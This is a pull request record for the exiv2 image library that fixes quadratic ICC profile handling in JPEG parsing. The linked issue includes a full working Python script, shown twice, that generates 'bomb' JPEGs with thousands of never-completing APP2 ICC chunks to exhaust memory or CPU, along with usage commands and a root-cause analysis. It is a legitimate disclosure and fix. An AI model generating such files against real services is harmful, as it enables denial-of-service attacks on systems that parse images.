### PR TITLE
Add new method appendIccProfile to fix quadratic performance issue

### LINKED ISSUE #3333: DoS vulnerability
### **File creation code:**
```
import sys, struct

def write_seg(f, marker, payload):
    # JPEG Segment Length (2 bytes, length included)
    L = len(payload) + 2
    if L > 0xFFFF:
        raise ValueError("Segment length exceeds 65535")
    f.write(b"\xFF" + bytes([marker]) + struct.pack(">H", L) + payload)

SOI = b"\xFF\xD8"
EOI = b"\xFF\xD9"
APP0 = b"\xFF\xE0\x00\x10JFIF\x00\x01\x02\x00\x00\x01\x00\x01\x00\x00"

def build_icc_payload(chunk_num=1, total_chunks=255, data_len=65519, first=False, declared_total=None):
    header = b"ICC_PROFILE\x00" + bytes([chunk_num]) + bytes([total_chunks])
    data = b"A" * data_len
    if first and declared_total is not None and data_len >= 4:
        data = struct.pack(">I", declared_total) + data[4:]
    return header + data

def main():
    mode = (sys.argv[1] if len(sys.argv) > 1 else "mem").lower()
    if mode not in ("mem", "cpu"):
        print("mode -> mem OR cpu")
        sys.exit(1)
    if mode == "mem":
        N_SEGS = int(sys.argv[2]) if len(sys.argv) > 2 else 8000
        PAYLOAD_LEN = int(sys.argv[3]) if len(sys.argv) > 3 else 65519  # 65533-14
        out = "icc_mem_bomb.jpg"
    else:
        N_SEGS = int(sys.argv[2]) if len(sys.argv) > 2 else 120000
        PAYLOAD_LEN = int(sys.argv[3]) if len(sys.argv) > 3 else 64
        out = "icc_cpu_bomb.jpg"

    # safety: The total segment length including the ICC header (14) must not exceed 65535.
    if PAYLOAD_LEN > 65519:
        raise ValueError("PAYLOAD_LEN -> 65519 below")

    total_bytes = 0
    with open(out, "wb") as f:
        f.write(SOI)
        f.write(APP0)
        # declared_total is the 'total profile size' hint value (fix chunk=1, chunks=255 to avoid completion)
        declared_total = PAYLOAD_LEN * N_SEGS
        for i in range(N_SEGS):
            payload = build_icc_payload(
                chunk_num=1,           # always 1 (To avoid being in a final   ##state)
                total_chunks=255,      # always 255
                data_len=PAYLOAD_LEN,
                first=(i == 0),
                declared_total=declared_total
            )
            write_seg(f, 0xE2, payload)  # APP2
            total_bytes += (2 + 2 + len(payload))  # marker(2) + len(2) + payload
        f.write(EOI)
        total_bytes += 4  # SOI/EOI
    print(f"[+] {out} Creation completed  | approx size: {total_bytes/1024/1024:.2f} MB")
    print(f"    mode={mode}, segments={N_SEGS}, payload_len={PAYLOAD_LEN}")

if __name__ == "__main__":
    main()

```

`
python3 make_icc_dos.py mem 14750 65519
ls -lh icc_mem_bomb.jpg
`
14750 → Number of segments
65519 → Payload byte size

CPU core: 1
RAM: 2GB
Ubuntu 20.04

Image

It seems worth reporting this as a DoS vulnerability.
It has been confirmed to crash when run in release mode on a low-spec environment.

Even with higher specs, generating an exponentially larger number of segments would cause the same issue.

### Root Cause
```
else if (marker == app2_ && size >= 13  // prevent out-of-bounds read in memcmp on next line
               && buf.cmpBytes(2, iccId_, 11) == 0) {
      if (size < 2 + 14 + 4) {
        rc = 8;
        break;
      }
      // ICC profile
      if (!foundIccData) {
        foundIccData = true;
        --search;
      }
      auto chunk = static_cast<int>(buf.read_uint8(2 + 12));
      auto chunks = static_cast<int>(buf.read_uint8(2 + 13));
      // ICC1v43_2010-12.pdf header is 14 bytes
      // header = "ICC_PROFILE\0" (12 bytes)
      // chunk/chunks are a single byte
      // Spec 7.2 Profile bytes 0-3 size
      uint32_t s = buf.read_uint32(2 + 14, bigEndian);
#ifdef EXIV2_DEBUG_MESSAGES
      std::cerr << "Found ICC Profile chunk " << chunk << " of " << chunks << (chunk == 1 ? " size: " : "")
                << (chunk == 1 ? s : 0) << '\n';
#endif
      // #1286 profile can be padded
      size_t icc_size = size - 2 - 14;
      if (chunk == 1 && chunks == 1) {
        enforce(s <= static_cast<uint32_t>(icc_size), ErrorCode::kerInvalidIccProfile);
        icc_size = s;
      }

      DataBuf profile(Safe::add(iccProfile_.size(), icc_size));
      if (!iccProfile_.empty()) {
        std::copy(iccProfile_.begin(), iccProfile_.end(), profile.begin());
      }
      std::copy_n(buf.begin() + 2 + 14, icc_size, profile.begin() + iccProfile_.size());
      setIccProfile(std::move(profile), chunk == chunks);
    }
```

`
if (size < 2 + 14 + 4) { rc = 8; break; }
`
Checks the minimum header length.

`
if (!foundIccData) { foundIccData = true; --search; }
`
Marks only the first occurrence, with no further control afterward.

`
auto chunk  = (int)buf.read_uint8(2 + 12);    // chunk number  
auto chunks = (int)buf.read_uint8(2 + 13);    // total count  
uint32_t s  = buf.read_uint32(2 + 14, bigEndian); // total profile length
`

`
size_t icc_size = size - 2 - 14; 
`
Payload length of the segment.

`
if (chunk == 1 && chunks == 1) {
  enforce(s <= (uint32_t)icc_size, ErrorCode::kerInvalidIccProfile);
  icc_size = s;
}
`
Only validates total length s in the case of a single chunk.

`
DataBuf profile(Safe::add(iccProfile_.size(), icc_size));
if (!iccProfile_.empty()) {
  std::copy(iccProfile_.begin(), iccProfile_.end(), profile.begin());
}
std::copy_n(buf.begin() + 2 + 14, icc_size, profile.begin() + iccProfile_.size());
setIccProfile(std::move(profile), chunk == chunks);    
// Marks completion if it is the last chunk.
`
This is not an accumulation into the existing buffer; instead, each time it creates a new buffer of “previous size + current chunk size”.

In other words, an unlimited number of APP2 chunks can be appended to iccProfile_ with no limit on the profile size.

No validation of chunk / chunks.

Normally, the chunks should be assembled in order, but there is no order checking, no detection of duplicates or missing chunks, and no limit on the maximum number of chunks.

This means an attacker can repeatedly send values like chunk=1, chunks=255 and force repeated reallocation.

Also, s is checked only above, and there is no check to ensure the total of multiple chunks does not exceed s → no limit.

The process of reallocation and full copy each time:

Through DataBuf profile(Safe::add(iccProfile_.size(), icc_size)); it creates a new buffer,
then copies all existing data each time.

If there are N chunks, the cost is proportional to 1 + 2 + ... + N.

This means high memory usage is possible.

Additionally,
setIccProfile(std::move(profile), chunk == chunks); ends processing only at the last chunk,

but if the attacker never sends the last chunk and instead keeps sending APP2 segments until EOI,
the parser will keep appending until the end, which leads to a DoS vulnerability.

2^16 → 65536 → starting from 0 means → 65535

Header size + padding → 2 + 14 → 16 bytes

By setting each segment size to 65519 bytes and creating a huge number of chunk pieces,
assigning them the same chunk number, a file can be generated.

By always assigning chunk=1 while chunks has a different value, the parser will never consider it “complete”.

**Thus, I set :**
`
chunk_num=1,           # always 1 (To avoid being in a final state)
total_chunks=255,      # always 255
`

In short, by repeatedly reallocating and copying the entire buffer for each segment,
a DoS vulnerability exists.

+ 
To increase the number of segments, you need to pass the calculated declared_total value of the first ICC segment through a 32-bit unsigned integer mask (0~0xFFFFFFFF).
This prevents struct.pack(">I", ...) from throwing an exception when the value exceeds the maximum allowed for a 32-bit integer.
With the modified code, you can set a very large number of segments without errors, and the ICC profile’s “total size” field will be recorded as a wrapped 32-bit value. This can potentially cause some parsers to consume excessive CPU or memory due to incorrect size handling.

**Modified Full Code:**
```
import sys, struct

def write_seg(f, marker, payload):
    # JPEG Segment Length (2 bytes length include)
    L = len(payload) + 2
    if L > 0xFFFF:
        raise ValueError("Segment length exceeds 65535")
    f.write(b"\xFF" + bytes([marker]) + struct.pack(">H", L) + payload)

SOI = b"\xFF\xD8"
EOI = b"\xFF\xD9"
APP0 = b"\xFF\xE0\x00\x10JFIF\x00\x01\x02\x00\x00\x01\x00\x01\x00\x00"

def build_icc_payload(chunk_num=1, total_chunks=255, data_len=65519, first=False, declared_total=None):
    header = b"ICC_PROFILE\x00" + bytes([chunk_num]) + bytes([total_chunks])
    data = b"A" * data_len
    if first and declared_total is not None and data_len >= 4:
        data = struct.pack(">I", declared_total) + data[4:]
    return header + data

def main():
    mode = (sys.argv[1] if len(sys.argv) > 1 else "mem").lower()
    if mode not in ("mem", "cpu"):
        print("mode -> mem OR cpu")
        sys.exit(1)
    if mode == "mem":
        N_SEGS = int(sys.argv[2]) if len(sys.argv) > 2 else 8000
        PAYLOAD_LEN = int(sys.argv[3]) if len(sys.argv) > 3 else 65519  # 65533-14
        out = "icc_mem_bomb.jpg"
    else:
        N_SEGS = int(sys.argv[2]) if len(sys.argv) > 2 else 120000
        PAYLOAD_LEN = int(sys.argv[3]) if len(sys.argv) > 3 else 64
        out = "icc_cpu_bomb.jpg"

    # safety: The total segment length including the ICC header (14) must not exceed 65535.
    if PAYLOAD_LEN > 65519:
        raise ValueError("PAYLOAD_LEN -> 65519 below")

    total_bytes = 0
    with open(out, "wb") as f:
        f.write(SOI)
        f.write(APP0)
        # declared_total is the 'total profile size' hint value (fix chunk=1, chunks=255 to avoid completion)
        declared_total = (PAYLOAD_LEN * N_SEGS) & 0xFFFFFFFF
        for i in range(N_SEGS):
            payload = build_icc_payload(
                chunk_num=1,           # always 1 (To avoid being in a final state)
                total_chunks=255,      # always 255
                data_len=PAYLOAD_LEN,
                first=(i == 0),
                declared_total=declared_total
            )
            write_seg(f, 0xE2, payload)  # APP2
            total_bytes += (2 + 2 + len(payload))  # marker(2) + len(2) + payload
        f.write(EOI)
        total_bytes += 4  # SOI/EOI
    print(f"[+] {out} Creation completed  | approx size: {total_bytes/1024/1024:.2f} MB")
    print(f"    mode={mode}, segments={N_SEGS}, payload_len={PAYLOAD_LEN}")

if __name__ == "__main__":
    main()
```

### PR DESCRIPTION
**Pull request by kevinbackhouse**
Fixes: #3333 

The code in jpgimage.cpp was quadratic because it was appending bytes to the end of the iccProfile by copying the entire array every time. This PR adds an `appendIccProfile` method so that the bytes can be appended efficiently.

### CODE REVIEW

File: include/exiv2/image.hpp [hunk 1]
```diff
@@ -195,6 +195,16 @@ class EXIV2API Image {
     @param bTestValid - tests that iccProfile contains credible data
    */
   virtual void setIccProfile(DataBuf&& iccProfile, bool bTestValid = true);
+  /*!
+    @brief Append more bytes to the iccProfile.
+    @param iccProfile DataBuf containing profile (binary)
+    @param bTestValid - tests that iccProfile contains credible data
+   */
+  virtual void appendIccProfile(const uint8_t* bytes, size_t size, bool bTestValid);
```
Comment (kmilos) [inline include/exiv2/image.hpp]: Mismatch between docstring and prototype

**Review by neheb — APPROVED** [review]
